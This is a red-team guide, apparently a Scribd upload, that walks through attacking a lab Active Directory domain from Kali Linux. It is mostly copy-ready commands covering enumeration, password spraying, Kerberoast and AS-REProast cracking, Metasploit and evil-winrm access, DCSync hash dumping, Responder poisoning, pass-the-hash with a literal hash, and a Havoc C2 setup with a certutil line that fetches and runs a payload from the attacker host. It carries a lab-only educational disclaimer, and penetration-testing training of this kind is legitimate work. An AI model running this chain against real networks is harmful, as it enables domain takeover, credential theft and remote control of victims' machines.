100% found this document useful (2 votes)
2K views28 pages

Attacking Active Directory (AD) From Kali Linux

Uploaded by

Mohammad Eid
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (2 votes)
2K views28 pages

Attacking Active Directory (AD) From Kali Linux

Uploaded by

Mohammad Eid
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 28

[OFFENSIVE OPS]:

Attacking Active Directory (AD) Environment


from Kali Linux

LinkedIn: https://www.linkedin.com/in/seang-y-phuon-a3652514b

By Seang Y Phuon - CEH [P], OSCP, CRTO and CRTE


▪ @ THECyb0rg Lab – a vulnerability research lab
• Founder
• Ethical Hacker
• Zer0-Day Hunter
▪ Red Team Lead @ Veilron Technologies Pte. Ltd.
▪ Red Team Member @ Synack
▪ Yogosha Strike Force @ Yogosha
▪ Instructor @ Sunrise Institute, @ OneSala E-Learning Platform
▪ Formerly Manager, Cyber Risk @ Deloitte

In collaboration with:
[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Introduction
Active Directory (AD) is a directory service for Windows domain networks environment created by
Microsoft that contains critical information about the users, systems, or objects within the
organization. This directory service has become a potential target going after by malicious threat
actors during the offensive operations. Due to its criticality, the threat actor will try to find possible
ways to gain foothold on one of the domain-joined systems that could be further leveraged the
access to enumerate and attack the Active Directory (AD) or domain controller (DC) and eventually,
laterally move from one machine to another within the compromised network.

Basically, to attack the Active Directory (AD) environment, the malicious attacker would need to
obtain initial access to one of the computer systems within the network and in most of the cases
it is Windows workstation. The attack of the Active Directory (AD) initiated from the compromised
workstation usually be performed using PowerShell terminal and scripts which is known as Living-
Off-The-Land (LOTL) approach utilizing the pre-installed or exiting tools and libraries within the
workstation.
To set aside from the attacks using PowerShell within Windows system, the attack techniques
outline in this research paper will be heavily relied on open-sourced tools and scripts published by
security researchers around the world and to demonstrate the attacks on the Active Directory (AD)
environment using Kali Linux system instead of Windows system as we usually see on most of the
research materials.

Disclaimers:
The demonstration of the attacks within this paper will be conducted within a vulnerable controlled
lab environment with minimal security protections enabled which is set up and configured by
THECyb0rg Lab and in collaboration with Veilron Technologies Pte. Ltd.

Bypassing the security protections is not in the scope of this paper and the demonstration within
this document is for educational purposes only. Such information discussed should never be used
for any malicious purposes or to attack against any unauthorized systems without prior permission.

The techniques and tools used here are to raise awareness to the public to better understand how
the attacks work and providing some insights to secure their target environment from the attacks
against the listed tools and scripts as per shown within the materials.

1| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Author
Seang Y PHUON (Codename: THECyb0rg) is the founder of THECyb0rg Lab and a Red Team Lead at Veilron
Technologies Pte. Ltd, specialized in leading and conducting red teaming operations as well as years of
professional experiences in vulnerability assessment and penetration testing (VAPT). Formerly, he was a
manager with years of experience in Cyber Risk Consulting at Deloitte (Cambodia) Co., Ltd for various
engagements for financial institutions, government sectors and other industries in Cambodia as well as
Laos, Vietnam, Malaysia, and Singapore. He’s currently also an instructor at Sunrise Institute of Technology
as well as a member of Yogosha Strike Force and Red Team Member at Synack.

Certifications:
▪ Certified Red Team Expert (CRTE)
▪ Certified Red Team Operator (CRTO)
▪ OffSec Certified Professional (OSCP)
▪ Certified Ethical Hacker (CEH - Practical)
▪ Bachelor of Computer Science and Engineering (CSE), RUPP, Cambodia

Speaker and Panelist:


▪ 1st Cybersecurity Bootcamp @ Sunrise Institute of Technology
▪ Cybersecurity Landscape Asia 2023
▪ Cambodia Cybersecurity 2023
▪ Cybersecurity Seminar at Cambodia Academy of Digital Technology (CADT)
▪ Young Bruiser Podcast
▪ Cyber Youth Cambodia Event #16

Contact:
▪ LinkedIn: https://www.linkedin.com/in/seang-y-phuon-a3652514b
▪ Facebook Public Figure: ភួន ស ៀងអ៊ី - PHUON Seang Y
▪ Phone #: +855 10 783 795

Misc:
▪ https://www.facebook.com/thecyb0rglab
▪ https://github.com/THECyb0rgLab
▪ https://www.youtube.com/@thecyb0rglab471

THECyb0rg Lab – a vulnerability research lab hunting for unknown vulnerabilities (0-Day) in computer software as well as
web applications. A lot of my work and research has been published on the Github Repository, Facebook Page and Youtube
channel including customized penetration testing tools, presentations, research papers, technical demonstration videos and
various forked projects etc.

2| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Table of Contents

1. Reconnaissance ...................................................................................................................4
1.1 Know Your #SHELL................................................................................................................. 4
1.2 Identify Potential Targets ........................................................................................................ 4
1.3 Unauthenticated Enumeration................................................................................................ 5
2. Exploitation ..........................................................................................................................8
2.1 Password Spray Attack........................................................................................................... 9
2.2 Kerberoast Attack ................................................................................................................ 10
2.3 AS-REProast Attack.............................................................................................................. 11
2.4 Initial Access ....................................................................................................................... 12
3. BloodHound and Authenticated Enumeration ...................................................................... 14
3.1 Authenticated LDAP Enumeration ......................................................................................... 14
3.2 Unleash Your BloodHound ................................................................................................... 15
4. Credential Harvest .............................................................................................................. 16
4.1 DCSync Attack..................................................................................................................... 17
4.2 Malicious Responder ........................................................................................................... 17
5. Lateral Movement ............................................................................................................... 20
5.1 Pass-The-Hash Attack (PTH) ................................................................................................. 20
5.1 PowerShell Remoting ........................................................................................................... 21
6. Havoc C2 Framework .......................................................................................................... 23

3| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

1. Reconnaissance
Identifying the potential target within the environment is a critical part of the operations as the
reconnaissance and network mapping process will provide insights about how big the network is
or the number of the systems within the environment and then hunt for the vulnerable systems
after being identified and evaluated.

1.1 Know Your #SHELL


Identify your own IP address and network subnet using native Linux commands:
# ifconfig; route -n

1.2 Identify Potential Targets


Identify live systems along with their associated IP addresses and hostnames:
# nbtscan -r 192.168.1920/24

4| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Identify all opened ports on the domain controller system using nmap scan:
# nmap -p- --min-rate=10000 -Pn 192.168.192.142 -n

Enumerate additional information about the domain controller and domain information using
LDAP script within nmap.
# nmap -sV 192.168.192.142 -n -p389,636 –script ldap-search.nse -Pn

1.3 Unauthenticated Enumeration


Enumeration is usually conducted after identifying the potential targets within the environment.
The enumeration aims to extract information from the targets as much as possible which such
gathered information could then be used for further attacks. Without authentication credentials,
we obtained various useful information as shown in the following.

5| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Enumerate domain users using windapsearch python scripts from ropnop Github repository:
# python3 windapsearch.py –dc-ip 192.168.192.142 -U –full | grep sAMAccountName

Further enumerating on the users, observed that the password for new user has been commented
within description attribute of the object which is commonly in use by most system administrators.
# python3 windapsearch.py –dc-ip 192.168.192.142 -U –full | grep -iE “sAMAccountName |
description”

Enumerate domain groups using the windapsearch python scripts:


# python3 windapsearch.py –dc-ip 192.168.192.142 -G | grep cn

6| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Enumerate for service account with Service Principal Name (SPN) registered that could be
potentially abused for Kerberoast attack:
# python3 windapsearch.py –dc-ip 192.198.192.142 –user-spns

Enumerate the service account (Kerberoast) using impacket library:


# ./GetUserSPNs.py -request thecyborg.lab

Enumerate the service account (AS-REProast) using impacket library:


# ./GetNPUsers.py -request thecyborg.lab/ -dc-ip 192.168.192.142

7| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Enumerate for anonymous/open share and attempt to access to it:


# smbclient -L \\\\192.168.192.142 -N

# smbclient \\\\192.168.192.142\\Common -N

2. Exploitation
Exploitation of the identified misconfigurations and vulnerabilities based on the information
gathered from the 2 stages above, is the launch of real attack against the potential targets. The
attack may involve spraying a possible or common password onto the list of enumerated users or
cracking the exposed service accounts using kerberoast or AS-REProast attack techniques.
Extract the enumerated domain users to a list that could then be used a userlist:
# python3 windapsearch.py –dc-ip 192.168.192.142 -U –full | grep -iE “sAMAccountName” | tee
Userlist.txt

8| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

2.1 Password Spray Attack


Perform password spray attack against the domain user via Kerberos port (88) using kerbrute from
ropnop Github repository:
# ./kerbrute passwordspray -d thecyborg.lab UserList Password@123 -dc 192.168.192.142

Perform password spray against the domain users via SMB protocol:
# crackmapexec smb 192.168.192.142 -u UserList.txt -p ‘Password@123’

Perform password spray against the domain users via WinRM protocol:
# crackmapexec winrm 192.168.192.142 -u UserList.txt -p ‘Password@123’

9| By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

2.2 Kerberoast Attack


Perform kerberoast attack against the service principal name (SPN) found on the enumeration
stage using impacket library:
# ./GetUserSPNs.py -request thecyborg.lab/user1:’Password@123’

Crack the kerberos ticket of the mssql_svc service account using well-known advanced hash
cracking tool hashcat:
# hashcat -a 0 -m 13100 kerbticket.txt /root/Desktop/AD-Lab/PasswordList.txt --force

10 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

2.3 AS-REProast Attack


Perform AS-REProast attack against a vulnerable user found on the enumeration stage using
impacket library:
# ./GetNPUsers.py -request thecyborg.lab/

11 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Crack the kerberos ticket of the philis.bill account using John-The-Ripper:


# john asrep.txt –wordlist=/root/Desktop/AD-Lab/PasswordList.txt

2.4 Initial Access


Gain access to the domain controller via WinRM using the identified credentials from password
spray attack stage:
# evil-winrm -i 192.168.192.142 -u user1 -p Password@123 -n

Gain access using PsExec module in Metasploit Framework with the identified credentials from
password spray attack stage:
# msfconsole

# msf > use exploit/windows/smb/psexec

12 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

# msf > set RHOST 192.168.192.142

# msf > set SMBUser user1

# msf > set SMBPass Password@123

# msf > exploit

13 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

3. BloodHound and Authenticated Enumeration


After obtaining the valid set of credentials from the password spray and kerberoast attack, the
obtained set of credentials could be used to further enumerate on the environment using
authenticated session and bloodhound against the Active Directory (AD) environment to visualize
the possible attack paths. Further noted that, some of the information enumerated in the phase
was not identified within unauthenticated enumeration stage.

3.1 Authenticated LDAP Enumeration


Enumerate computer objects within the environment using the identified set of credentials:
# python3 windapsearch.py -u user1 -p Password@123 -d thecyborg.lab -C

14 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Enumerate unconstrained delegation systems within the environment using the identified set of
credentials:
# python3 windapsearch.py -u user1 -p Password@123 -d thecyborg.lab –unconstrained-
computer

3.2 Unleash Your BloodHound


Extract the domain objects using bloodhound-python from the Kali Linux system using the
identified set of credentials:
# bloodhound-python -u user1 -p ‘Password@123’ -c All -dc thecyborg-ad.thecyborg.lab -d
thecyborg.lb -ns 192.168.192.142
# neo4j console
# bloodhound

15 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

The extracted result of the domain objects in bloodhound:

4. Credential Harvest
Extracting the domain credentials could be achieved via DCSync attack and malicious responder.
Such activity has been used to achieve domain dominance. The extracted set of credentials/hashes
could then be used to laterally move around the network and critical hashes of the domain
administrator or krbtgt hashes could be used to create silver or golden tickets as well as perform
Pass-The-Hash attack etc.

16 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

4.1 DCSync Attack


Enumerate the Domain Admins group observed that the user1 is the part of the privileged group
which could be abused for the DCSync attack against the domain:
# python3 ./windapsearch.py -d thecyborg.lab -u user1 -p Password@123 -m ‘Domain Admins’

The password hashes of the domain users could be extracted from the domain controller using
impacket library:
# ./secretdump.py thecyborg.lab/user1:’Password@123’@192.168.192.142

Once the administrator hashes have been obtained and could then be used to gain access to the
domain controller using administrator account using Pass-The-Hash (PTH) attack. (Refer to #6 –
Lateral Movement)

4.2 Malicious Responder


Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP and
other rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security
NTLMSSP and Basic HTTP authentication. The Responder is a very powerful tool and could be used
to collect password hashes of the vulnerable systems within the network.
# responder -I eth0 –wpad -v

17 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Any users within the network attempting to access to any invalid URLs or shared folders will be
responded by the Responder and the password hashes will be requested from the vulnerable
systems/users on the network and the password hashes could be cracked using John-The-Ripper
or Hashcat.
Access to the invalid URL (thecyborglab) via HTTP protocol from a client workstation
(192.168.192.138):

18 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

The NTLMv2 hashes for user1 was captured by the Responder from the HTTP protocol:

Crack the NTLMv2 password hashes using John-The-Ripper:


# john ntlmhashes.txt –wordlist=./PasswordList.txt

Access to the invalid shared folder (\\thecyborglab) via SMB protocol from vulnerable domain
controller (192.168.192.142):

The NTLMv2 hashes for Administrator was captured by the Responder from the SMB protocol:

19 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Crack the NTLMv2 password hashes using John-The-Ripper:


# john ntlmhash.txt –wordlist=./PasswordList.txt

5. Lateral Movement
Moving laterally from one system to another after obtaining the valid set of credentials or hashes
is a common action performed by the malicious threat actor. The local administrator account
credentials usually remain the same across the entire domain if Local Administrator Password
Solution (LAPS) was not implemented within the environment. Abusing this insecure practice may
lead to security compromise of all the workstation within the entire domain.

5.1 Pass-The-Hash Attack (PTH)


The password hashes of the administrator could be used to perform Pass-The-Hash attack by using
the obtained hashes instead of the clear-text password to gain access to the connected systems
within the network.
Access to a workstation system (192.168.192.139) using the administrator password hashes
obtained from the DCSync attack:
# ./psexec.py thecyborg.lab/[email protected] \
-hashes ‘aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b’

20 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Access to the domain controller (192.168.192.142) using the administrator password hashes
obtained from the DCSync attack:
# ./psexec.py thecyborg.lab/[email protected] \
-hashes ‘aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b’

5.1 PowerShell Remoting


From PowerShell access via PsExec on the domain controller (192.168.192.142), initiating remote
access is possible to other 2 workstations on the network such as PC1.thecyborg.lab and
PC2.thecyborg.lab via PowerShell remoting.
Access to PC1.thecyborg.lab via PowerShell remoting:
# ./psexec.py thecyborg.lab/[email protected] \
-hashes ‘aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b’
# powershell
# Enter-PSSession -ComputerName PC1.thecyborg.lab

21 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Access to PC2.thecyborg.lab via PowerShell remoting:


# ./psexec.py thecyborg.lab/[email protected] \
-hashes ‘aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b’
# powershell
# Enter-PSSession -ComputerName PC2.thecyborg.lab

22 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

6. Havoc C2 Framework
Command and Control Server (C2) is the centralized server used to control the compromised
systems on the target environment. There are many C2s that have been used by the attackers such
as Cobalt Strike, Brute Ratel and more. However, as the scope of the paper relies heavily on the
open-sourced tools and frameworks. Therefore, the Havoc C2 is used for the demonstration.
Configure C2 profile:
# nano /usr/share/havoc/profiles/havoc.yaotl

Fire up the C2 server:


# havoc server –profile /user/share/havoc/profiles/havoc.yaotl

23 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Invoke the Havoc client, connect to the server and setup listener:
# havoc client

# On windows > View > Listener > Add

Generate the malicious payload using the configured listener and deploy on the compromised
target systems:
# On windows > Attack > Payload > Generate

24 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Host the generated malicious payload using python server module on port 9090:
# python -m http.server 9090

Pass the session from the native command access into C2 command server leveraging the PTH
technique:
# ./psexec.py thecyborg.lab/[email protected] \
-hashes ‘aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b’
# certutil.exe -urlcache -f http://192.168.192.128:9090/demon.x64.exe demon.exe
# demon.exe

25 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Replication of the same above technique to gain C2 command access on the compromised systems
for both PC1.thecyborg.lab and PC2.thecyborg.lab workstations:

26 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified


[OFFENSIVE OPS]:
Attacking Active Directory (AD) Environment from Kali Linux By: THECyb0rg Lab

Appendix
Resources and References:
https://github.com/WaterExecution/vulnerable-AD-plus

https://www.kali.org/get-kali

https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/fortra/impacket

https://hashcat.net/hashcat/

https://github.com/openwall/john

https://github.com/HavocFramework/Havoc

https://github.com/SpiderLabs/Responder

https://github.com/ropnop/windapsearch

https://github.com/ropnop/kerbrute

https://www.metasploit.com/

https://github.com/dirkjanm/BloodHound.py

Contact:
▪ LinkedIn: https://www.linkedin.com/in/seang-y-phuon-a3652514b
▪ Facebook Public Figure: ភួន ស ៀងអ៊ី - PHUON Seang Y
▪ Phone #: +855 10 783 795

Misc:
▪ https://www.facebook.com/thecyb0rglab
▪ https://github.com/THECyb0rgLab
▪ https://www.youtube.com/@thecyb0rglab471

In collaboration with:

THECyb0rg Lab – a vulnerability research lab hunting for unknown vulnerabilities (0-Day) in computer software as well as
web applications. A lot of my work and research has been published on the Github Repository, Facebook Page and Youtube
channel including customized penetration testing tools, presentations, research papers, technical demonstration videos and
various forked projects etc.

27 | By: Seang Y Phuon – C|EH [P], OSCP, CRTO, CRTE Certified

You might also like